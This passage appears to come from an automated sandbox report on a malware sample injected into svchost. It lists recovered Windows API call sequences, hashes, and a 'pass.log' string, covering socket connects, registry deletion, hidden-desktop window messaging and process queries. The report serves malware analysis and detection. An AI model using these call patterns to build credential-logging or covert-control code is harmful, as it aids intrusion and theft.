                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C881B4
                                                                                                                                                                                                            • WSASetLastError.WS2_32(?), ref: 02C881DE
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast$Read
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2835504744-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C9F540: htons.WS2_32(?), ref: 02C9F564
                                                                                                                                                                                                              • Part of subcall function 02C9F540: inet_addr.WS2_32(?), ref: 02C9F56F
                                                                                                                                                                                                              • Part of subcall function 02C9F540: htonl.WS2_32(000000FF), ref: 02C9F57A
                                                                                                                                                                                                              • Part of subcall function 02C9F540: gethostbyname.WS2_32(?), ref: 02C9F586
                                                                                                                                                                                                              • Part of subcall function 02C9F540: socket.WS2_32(00000002,00000001,00000000), ref: 02C9F5A0
                                                                                                                                                                                                              • Part of subcall function 02C9F540: connect.WS2_32(00000000,?,00000010), ref: 02C9F5B3
                                                                                                                                                                                                              • Part of subcall function 02C9F540: closesocket.WS2_32(00000000), ref: 02C9F5BE
                                                                                                                                                                                                            • setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02C9F21F
                                                                                                                                                                                                            • closesocket.WS2_32 ref: 02C9F234
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: closesocket$connectgethostbynamehtonlhtonsinet_addrsetsockoptsocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2706992148-0
                                                                                                                                                                                                            • Opcode ID: 53adfa6ea3cf7b33249b95afa0770064adb70ff08dbdb1e7d2fb769282cd73ba
                                                                                                                                                                                                            • Instruction ID: cc431ba2af91e8e9b9009b5b2c384af590350d5debc5c8f42bee17bc6d3df787
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53adfa6ea3cf7b33249b95afa0770064adb70ff08dbdb1e7d2fb769282cd73ba
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A310A75A40615BBDB10CFA8E84DBEAB7A8FF05710F20825AF515C7180EB719A54CBE1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 02C79057
                                                                                                                                                                                                            • IsRectEmpty.USER32(?), ref: 02C790C6
                                                                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 02C790D6
                                                                                                                                                                                                            • GetParent.USER32(?), ref: 02C790EA
                                                                                                                                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,02C79754), ref: 02C790F3
                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,02C79754,00000000,00008001,0000630C,?,02C79754,00000000,00008001,?), ref: 02C79115
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Rect$EmptyLongParentPoints
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 379166938-0
                                                                                                                                                                                                            • Opcode ID: 374e363667ad26d19e2a5c50ec631439f3f6d0eb4c8d02660777ea6d35d9f735
                                                                                                                                                                                                            • Instruction ID: 4e9a8a0b1bcc44802f0ea67f31edd1616058c903fd7bc8432f77e8a2b9c7038a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 374e363667ad26d19e2a5c50ec631439f3f6d0eb4c8d02660777ea6d35d9f735
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F313071E40219EFDB01CFA9D949AFEBBB8FF49710F104699E445A7240D7B09A10CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocexitfree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3367576030-0
                                                                                                                                                                                                            • Opcode ID: 64cf0029b2f039a47c8f44471105e99cfb02d11d2272fc1700fe2650d6133c84
                                                                                                                                                                                                            • Instruction ID: 969ca29441430a44ae7d068f8bd1570233bf6ff43ec5cf71020b18c90718a8d7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64cf0029b2f039a47c8f44471105e99cfb02d11d2272fc1700fe2650d6133c84
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64213DB6A00359AFDB11CF58DC81BAB77A8FF88310F044569ED4597340D772EE108BA2
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02C81ACE
                                                                                                                                                                                                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 02C81AE9
                                                                                                                                                                                                              • Part of subcall function 02C81330: memset.MSVCRT ref: 02C81347
                                                                                                                                                                                                              • Part of subcall function 02C81330: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7556F550,00000000), ref: 02C8135E
                                                                                                                                                                                                              • Part of subcall function 02C81330: PathAddBackslashA.SHLWAPI(?,?,7556F550,00000000), ref: 02C8136B
                                                                                                                                                                                                              • Part of subcall function 02C81330: PathFileExistsA.SHLWAPI(?,?,7556F550,00000000), ref: 02C813A7
                                                                                                                                                                                                              • Part of subcall function 02C81330: lstrcpynA.KERNEL32(02CC7C28,00000000,00000104,00000000,00000001,?,7556F550,00000000), ref: 02C813D1
                                                                                                                                                                                                              • Part of subcall function 02C81330: GetProcessHeap.KERNEL32(00000000,00000000,?,7556F550,00000000), ref: 02C813E0
                                                                                                                                                                                                              • Part of subcall function 02C81330: HeapValidate.KERNEL32(00000000,?,7556F550,00000000), ref: 02C813E3
                                                                                                                                                                                                              • Part of subcall function 02C81330: GetProcessHeap.KERNEL32(00000000,00000000,?,7556F550,00000000), ref: 02C813F0
                                                                                                                                                                                                              • Part of subcall function 02C81330: HeapFree.KERNEL32(00000000,?,7556F550,00000000), ref: 02C813F3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B47
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C81B4A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B57
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C81B5A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Path$FreeValidate$AncestorBackslashExistsFileFolderTextWindowlstrcpynmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 649337724-0
                                                                                                                                                                                                            • Opcode ID: 1d786c4ce8f3e7b9c375caa0773c66e8652aa73733a14f89ed2191edea3b9b28
                                                                                                                                                                                                            • Instruction ID: 26e08be0b0e164c66fd54795b2ce944ec44a80d45b1e8e4f516e699ee8a2f7d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d786c4ce8f3e7b9c375caa0773c66e8652aa73733a14f89ed2191edea3b9b28
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9611C8B1E4425457DB206B349C18FF33BE89B91358F088A94E88C87180FBB0D95ACB60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA380), ref: 02C89B47
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C89B85
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 02C89BC9
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FilePath$AttributesBackslashExists
                                                                                                                                                                                                            • String ID: 6D1DA380$pass.log
                                                                                                                                                                                                            • API String ID: 2713433229-604133603
                                                                                                                                                                                                            • Opcode ID: 78619ef695ab782b7263028e11ce17cc6bd4f0f8d27fa45550990d259e2171eb
                                                                                                                                                                                                            • Instruction ID: dd6b5d5ff430268dd9c764518b0ef113d75c22a133e28c216694d89d03cf3145
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78619ef695ab782b7263028e11ce17cc6bd4f0f8d27fa45550990d259e2171eb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 691127319046484BD7229B28A8A47F7BBE4EFC6301F14C6E4ECCAD7301EA30DA59C780
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C92F00: OpenProcess.KERNEL32(00000000,00001400,00000000,00000000,7742FFB0,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F2C
                                                                                                                                                                                                              • Part of subcall function 02C92F00: GetProcessTimes.KERNEL32(00000000,02C86436,?,?,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F4A
                                                                                                                                                                                                              • Part of subcall function 02C92F00: GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F68
                                                                                                                                                                                                              • Part of subcall function 02C92F00: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F79
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000,00000000,02C865A8), ref: 02C862F9
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86315
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05ACC1B8), ref: 02C8633A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8633D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05ACC1B8), ref: 02C8634A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8634D
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86358
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3901171168-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02C9A909
                                                                                                                                                                                                              • Part of subcall function 02C9F0F0: __WSAFDIsSet.WS2_32(?,?), ref: 02C9F1A0
                                                                                                                                                                                                              • Part of subcall function 02C9F0F0: closesocket.WS2_32(?), ref: 02C9F1BD
                                                                                                                                                                                                            • realloc.MSVCRT ref: 02C9A915
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02C9A94D
                                                                                                                                                                                                            • realloc.MSVCRT ref: 02C9A959
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02C9A9AC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: malloc$realloc$closesocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3133911991-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C83079
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830AC
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830D8
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830FF
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02C8317D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C713EE
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7142A
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C71456
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7147D
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02C714A8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 02C88212
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C88243
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C8826F
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C88296
                                                                                                                                                                                                            • WSASetLastError.WS2_32(?), ref: 02C882C9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,02C822AB,00000000,00010108,?,00000000), ref: 02C936DF
                                                                                                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02C93714
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C9373E
                                                                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(00000104,02C822AB), ref: 02C93756
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C93762
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                                                                                            • Opcode ID: a22b862fa647e953029aae80ff2f96f161f4a9ea18174d0d1adeba07f20360f8
                                                                                                                                                                                                            • Instruction ID: 7fb592411c16b9625478df549eae7303d651cc39d5f0bd80f854c0c5892efd56
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a22b862fa647e953029aae80ff2f96f161f4a9ea18174d0d1adeba07f20360f8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A217476E40158ABDB21DA58DC48FEAB7ACEF85B10F1082D5FD44EB240D7B1AE548BD0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2377537114-0
                                                                                                                                                                                                            • Opcode ID: 8395759df2680560837155c9172614cfa67c7f3d6aaca21d69cc930b074bc6fd
                                                                                                                                                                                                            • Instruction ID: c08f22b8a041d20cf0afc80c082c48cf2a026f55f6d974c7d19bec6c713f0404
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8395759df2680560837155c9172614cfa67c7f3d6aaca21d69cc930b074bc6fd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E52190B1A0024AAFC714CF59E480B6ABBF5FF89304F14892CD98EC7300E771A661CB85
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C761EA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C761F1
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76205
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C7621E
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C7622C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3057210225-0
                                                                                                                                                                                                            • Opcode ID: 7bea04ede20f95714734c4022fbc73ad228c7d020ed77ea41a7ec876b47ed26c
                                                                                                                                                                                                            • Instruction ID: 4f0b01245737fa7da752c37295db53623940fa9153e1b90dd3e3a415debeda5d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bea04ede20f95714734c4022fbc73ad228c7d020ed77ea41a7ec876b47ed26c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B114E31E815981BEB2B9774AC0DBDD779CEF5C704F1049E9EA49D7181D3B08A848B91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000), ref: 02C7C2C2
                                                                                                                                                                                                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C7C2D9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7C2EF
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C7C300
                                                                                                                                                                                                            • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02C7C317
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1270303404-0
                                                                                                                                                                                                            • Opcode ID: ffefde84407ffa3bf936f714ec4d8c0ba9547b0d4e51b9316abd8307bece1bdc
                                                                                                                                                                                                            • Instruction ID: fa5839e23e620cd07b6d641c22ee302d381c8dd328d23801ca2f16bbda693b11
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffefde84407ffa3bf936f714ec4d8c0ba9547b0d4e51b9316abd8307bece1bdc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB016D31A81658BBE721DB909D09FEABB7CAB05700F004685BE05A61C0DBB05B84CAA9
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?,?,00000000,75573080,?,02C782BC,?,00000006,00000000), ref: 02C7D33C
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02C7D353
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7D356
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000006,?,02C782BC), ref: 02C7D36D
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000003), ref: 02C7D372
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3855296974-0
                                                                                                                                                                                                            • Opcode ID: 44198578d312c57fc9eb2ae3cdbaf9db90f23ab8b14fd1f3ee048e683ca965c8
                                                                                                                                                                                                            • Instruction ID: ac6f0cea62db6b4614dbee0b083b0783286056901d2d81e97fb8edad2a23fa5b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44198578d312c57fc9eb2ae3cdbaf9db90f23ab8b14fd1f3ee048e683ca965c8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0F08276A807187FD622DB55EC88FABB7ACEFC8B60F014605F90497340CA70ED118AB0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7C33C
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C7C344
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C7C350
                                                                                                                                                                                                            • SendMessageA.USER32(?,0000000D,?,?), ref: 02C7C361
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C7C36D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
